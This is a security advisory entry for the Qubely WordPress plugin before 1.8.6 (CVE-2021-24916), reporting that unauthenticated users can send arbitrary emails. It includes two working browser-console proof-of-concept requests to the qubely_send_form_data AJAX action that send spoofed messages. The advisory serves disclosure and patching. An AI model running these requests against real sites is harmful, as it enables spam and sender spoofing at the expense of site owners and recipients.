Lucene search
Krzysztof ZającWPEX-ID:93B893BE-59AD-4500-8EDB-9FA7A45304D5HistoryJul 17, 2023 - 12:00 a.m.
Qubely < 1.8.6 - Unauthenticated Arbitrary E-mail Sending
2023-07-1700:00:00
Krzysztof Zając
49
qubely
unauthenticated
email sending
exploit
0.001 Low
EPSS
Percentile
32.7%
Description The plugin allows unauthenticated user to send arbitrary e-mails to arbitrary addresses via the qubely_send_form_data AJAX action.
Execute the below command in the web developer console, on the blog homepage as an unauthenticated user, replacing domain by the domain of the blog:
Current PoC:
jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': '[email protected]', 'email-subject': 'Unauthorised Email', 'email-from': 'xx:sender@DOMAIN', 'email-body':'Yolo', 'security': qubely_urls['nonce'] })
Pre-1.8.5 PoC:
jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': btoa('[email protected]'), 'email-subject': btoa('Unauthorised Email'), 'email-from': btoa('xx:sender@DOMAIN'), 'email-body': btoa('Yolo') });Related
nvd
nvd
CVE-2021-24916
2023-08-07 15:15:10
wpvulndb
wpvulndb
Qubely < 1.8.6 - Unauthenticated Arbitrary E-mail Sending
2023-07-17 00:00:00
prion
prion
Design/Logic Flaw
2023-08-07 15:15:00
cve
cve
CVE-2021-24916
2023-08-07 15:15:10
cvelist
cvelist
CVE-2021-24916 Qubely < 1.8.6 - Unauthenticated Arbitrary E-mail Sending
2023-08-07 14:31:23